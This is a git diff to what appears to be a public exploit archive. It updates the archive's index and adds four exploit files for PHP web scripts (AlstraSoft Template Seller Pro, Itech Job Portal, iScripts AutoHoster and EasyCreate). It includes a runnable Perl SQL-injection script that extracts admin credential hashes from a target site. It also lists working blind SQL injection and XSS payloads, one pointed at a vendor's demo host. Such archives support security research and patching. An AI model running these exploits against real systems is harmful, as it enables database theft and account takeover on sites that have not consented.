diff --git a/files.csv b/files.csv
index 14220757b..86efe5941 100644
--- a/files.csv
+++ b/files.csv
@@ -25548,7 +25548,7 @@ id,file,description,date,author,platform,type,port
 19185,platforms/hardware/webapps/19185.txt,"Huawei HG866 - Authentication Bypass",2012-06-16,hkm,hardware,webapps,0
 19187,platforms/php/webapps/19187.txt,"WordPress Plugin Automatic 2.0.3 - SQL Injection",2012-06-16,nick58,php,webapps,0
 19188,platforms/php/webapps/19188.txt,"Nuked Klan SP CMS 4.5 - SQL Injection",2012-06-16,Vulnerability-Lab,php,webapps,0
-19189,platforms/php/webapps/19189.txt,"iScripts EasyCreate CMS 2.0 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,php,webapps,0
+19189,platforms/php/webapps/19189.txt,"iScripts EasyCreate 2.0 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,php,webapps,0
 19263,platforms/hardware/webapps/19263.txt,"QNAP Turbo NAS 3.6.1 Build 0302T - Multiple Vulnerabilities",2012-06-18,"Sense of Security",hardware,webapps,0
 19264,platforms/php/webapps/19264.txt,"MyTickets 1.x < 2.0.8 - Blind SQL Injection",2012-06-18,al-swisre,php,webapps,0
 19292,platforms/php/webapps/19292.txt,"iBoutique eCommerce 4.0 - Multiple Web Vulnerabilities",2012-06-19,Vulnerability-Lab,php,webapps,0
@@ -36228,11 +36228,11 @@ id,file,description,date,author,platform,type,port
 38882,platforms/cgi/webapps/38882.txt,"Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote Denial of Service",2013-12-16,"DTAG Group Information Security",cgi,webapps,0
 38883,platforms/asp/webapps/38883.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - apps/news-events/newdetail.asp id Parameter SQL Injection",2013-12-13,R3d-D3V!L,asp,webapps,0
 38884,platforms/asp/webapps/38884.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - 'login.asp' Multiple Field SQL Injection Authentication Bypass",2013-12-13,R3d-D3V!L,asp,webapps,0
-38885,platforms/php/webapps/38885.txt,"iScripts AutoHoster - /checktransferstatus.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
-38886,platforms/php/webapps/38886.txt,"iScripts AutoHoster - /checktransferstatusbck.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
-38887,platforms/php/webapps/38887.txt,"iScripts AutoHoster - /additionalsettings.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
-38888,platforms/php/webapps/38888.txt,"iScripts AutoHoster - /payinvoiceothers.php invno Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
-38889,platforms/php/webapps/38889.txt,"iScripts AutoHoster - /support/parser/main_smtp.php Unspecified Traversal",2013-12-15,i-Hmx,php,webapps,0
+38885,platforms/php/webapps/38885.txt,"iScripts AutoHoster - 'checktransferstatus.php' SQL Injection",2013-12-15,i-Hmx,php,webapps,0
+38886,platforms/php/webapps/38886.txt,"iScripts AutoHoster - 'checktransferstatusbck.php' SQL Injection",2013-12-15,i-Hmx,php,webapps,0
+38887,platforms/php/webapps/38887.txt,"iScripts AutoHoster - 'additionalsettings.php' SQL Injection",2013-12-15,i-Hmx,php,webapps,0
+38888,platforms/php/webapps/38888.txt,"iScripts AutoHoster - 'invno' Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
+38889,platforms/php/webapps/38889.txt,"iScripts AutoHoster - 'main_smtp.php' Unspecified Traversal",2013-12-15,i-Hmx,php,webapps,0
 38890,platforms/php/webapps/38890.txt,"iScripts AutoHoster - 'tmpid' Parameter Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
 38891,platforms/php/webapps/38891.txt,"iScripts AutoHoster - 'fname' Parameter Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
 38892,platforms/php/webapps/38892.txt,"iScripts AutoHoster - 'id' Parameter Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
@@ -37021,7 +37021,7 @@ id,file,description,date,author,platform,type,port
 41017,platforms/hardware/webapps/41017.txt,"Huawei Flybox B660 - Cross-Site Request Forgery",2017-01-10,Vulnerability-Lab,hardware,webapps,0
 41023,platforms/php/webapps/41023.txt,"Itech Travel Portal Script 9.33 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
 41024,platforms/php/webapps/41024.txt,"Itech Movie Portal Script 7.35 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
-41028,platforms/php/webapps/41028.txt,"Job Portal Script 9.11 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps,0
+41028,platforms/php/webapps/41028.txt,"Itech Job Portal Script 9.11 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps,0
 41029,platforms/php/webapps/41029.txt,"Online Food Delivery 2.04 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps,0
 41032,platforms/php/webapps/41032.pl,"iTechscripts Freelancer Script 5.11 - 'sk' Parameter SQL Injection",2017-01-11,v3n0m,php,webapps,0
 41033,platforms/hardware/webapps/41033.txt,"D-Link DIR-615 - Multiple Vulnerabilities",2017-01-10,"Osanda Malith",hardware,webapps,0
@@ -37176,3 +37176,7 @@ id,file,description,date,author,platform,type,port
 41245,platforms/php/webapps/41245.html,"Alstrasoft Flippa Clone MarketPlace Script 4.10 - Cross-Site Request Forgery (Add Admin)",2017-02-04,"Ihsan Sencan",php,webapps,0
 41246,platforms/php/webapps/41246.html,"Alstrasoft FMyLife Pro 1.02 - Cross-Site Request Forgery (Add Admin)",2017-02-04,"Ihsan Sencan",php,webapps,0
 41247,platforms/php/webapps/41247.txt,"Alstrasoft Forum Pay Per Post Exchange Script 2.01 - SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0
+41249,platforms/php/webapps/41249.pl,"Alstrasoft Template Seller Pro 3.25e - 'tempid' Parameter SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0
+41250,platforms/php/webapps/41250.txt,"Itech Job Portal Script 9.13 - Multiple Vulnerabilities",2017-02-04,Th3GundY,php,webapps,0
+41251,platforms/php/webapps/41251.txt,"iScripts AutoHoster 3.0 - 'siteid' Parameter SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0
+41252,platforms/php/webapps/41252.txt,"iScripts EasyCreate 3.2 - 'siteid' Parameter SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/php/webapps/41249.pl b/platforms/php/webapps/41249.pl
new file mode 100755
index 000000000..5477831a5
--- /dev/null
+++ b/platforms/php/webapps/41249.pl
@@ -0,0 +1,44 @@
+#!/usr/bin/perl -w
+# # # # # 
+# Exploit Title: AlstraSoft Template Seller Pro v3.25e Script (buy.php)- Remote SQL Injection Vulnerability
+# Google Dork: N/A
+# Date: 04.02.2017
+# Vendor Homepage: http://www.alstrasoft.com/
+# Software Buy: http://www.alstrasoft.com/template.htm
+# Demo: http://blizsoft.com/templates/
+# Version: 3.25e
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+sub clear{
+system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
+clear();
+print "|----------------------------------------------------|\n";
+print "| Template Seller Pro v3.25e Remote SQL Injector     |\n";
+print "| Author: Ihsan Sencan                               |\n";
+print "| Author Web: http://ihsan.net                       |\n";
+print "| Mail : ihsan[beygir]ihsan[nokta]net                |\n";
+print "|                                                    |\n";
+print "|                                                    |\n";
+print "|----------------------------------------------------|\n";
+use LWP::UserAgent;
+print "\nInsert Target:[http://wwww.site.com/path/]: ";
+chomp(my $target=<STDIN>);
+print "\n[!] Exploiting Progress...\n";
+print "\n";
+$elicha="group_concat(user_name,char(58),user_password)";
+$table="UserDB";
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+$host = $target . "buy.php?tempid=-1+union+select+1,2,3,".$elicha.",5,6,7,8+from/**/".$table."+--+";
+$res = $b->request(HTTP::Request->new(GET=>$host));
+$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
+print "\n[+] Admin Hash : $1\n";
+print "[+] Success !!\n";
+print "\n";
+}
+else{print "\n[-]Not found.\n";
+}
\ No newline at end of file
diff --git a/platforms/php/webapps/41250.txt b/platforms/php/webapps/41250.txt
new file mode 100755
index 000000000..e11a54de5
--- /dev/null
+++ b/platforms/php/webapps/41250.txt
@@ -0,0 +1,66 @@
+# Exploit Title 	:  Itech Job Portal Script - Multiple Vulnerabilities
+# Author 		:  Yunus YILDIRIM (Th3GundY)
+# Team 			:  CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
+# Website 		:  http://www.yunus.ninja
+# Contact 		:  yunusyildirim@protonmail.com
+
+# Vendor Homepage 	: http://itechscripts.com/
+# Software Link  	: http://itechscripts.com/job-portal-script/
+# Vuln. Version	  	: 9.13
+# Demo			: http://job-portal.itechscripts.com/
+
+
+# # # #  DETAILS  # # # # 
+
+SQL Injections :
+
+# 1
+http://localhost/career_advice_details.php?cid=5
+    Parameter: cid (GET)
+        Type: boolean-based blind
+        Title: AND boolean-based blind - WHERE or HAVING clause
+        Payload: cid=5' AND 7504=7504-- zpmu
+
+        Type: AND/OR time-based blind
+        Title: MySQL >= 5.0.12 OR time-based blind (comment)
+        Payload: cid=5' OR SLEEP(5)#
+
+# 2
+http://localhost/news_details_us.php?nid=1
+    Parameter: nid (GET)
+        Type: boolean-based blind
+        Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+        Payload: nid=1' RLIKE (SELECT (CASE WHEN (2796=2796) THEN 1 ELSE 0x28 END))-- WmMl
+
+        Type: AND/OR time-based blind
+        Title: MySQL >= 5.0.12 OR time-based blind
+        Payload: nid=1' OR SLEEP(5)-- UoUN
+
+# # # # # # # # # # # # # # # # # # # # # # # # 
+
+Cross site scriptings (XSS) :
+
+# 1
+http://localhost/search_result_alluser.php?function="><svg/onload=prompt('CT-Zer0');>
+    Parameter: function (GET)
+    Payload: "><svg/onload=prompt('CT-Zer0');>
+
+# 2
+http://localhost/search_result_alluser.php?ind="><svg/onload=prompt('CT-Zer0');>
+    Parameter: ind (GET)
+    Payload: "><svg/onload=prompt('CT-Zer0');>
+
+# 3
+http://localhost/search_result_alluser.php?loc="><svg/onload=prompt('CT-Zer0');>
+    Parameter: loc (GET)
+    Payload: "><svg/onload=prompt('CT-Zer0');>
+
+# 4
+http://localhost/search_result_alluser.php?compid="><svg/onload=prompt('CT-Zer0');>
+    Parameter: compid (GET)
+    Payload: "><svg/onload=prompt('CT-Zer0');>
+
+# 5
+http://job-portal.itechscripts.com/search_result_alluser.php?days_chk="><svg/onload=prompt('CT-Zer0');>
+    Parameter: days_chk (GET)
+    Payload: "><svg/onload=prompt('CT-Zer0');>
diff --git a/platforms/php/webapps/41251.txt b/platforms/php/webapps/41251.txt
new file mode 100755
index 000000000..3fb4885c6
--- /dev/null
+++ b/platforms/php/webapps/41251.txt
@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: iScripts AutoHoster v3.0 Script - SQL Injection
+# Google Dork: N/A
+# Date: 04.02.2017
+# Vendor Homepage: http://www.iscripts.com/
+# Software Buy: http://www.iscripts.com/autohoster/
+# Demo: http://www.demo.iscripts.com/autohoster/demo/
+# Version: 3.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/websitebuilder/getsitedetails.php?action=editsite&siteid=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41252.txt b/platforms/php/webapps/41252.txt
new file mode 100755
index 000000000..0c59e15b3
--- /dev/null
+++ b/platforms/php/webapps/41252.txt
@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: iScripts EasyCreate v3.2 Script - SQL Injection
+# Google Dork: N/A
+# Date: 04.02.2017
+# Vendor Homepage: http://www.iscripts.com/
+# Software Buy: http://www.iscripts.com/easycreate/
+# Demo: http://www.demo.iscripts.com/easycreate/demo//
+# Version: 3.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/getsitedetails.php?action=editsite&siteid=[SQL]
+# # # # #
\ No newline at end of file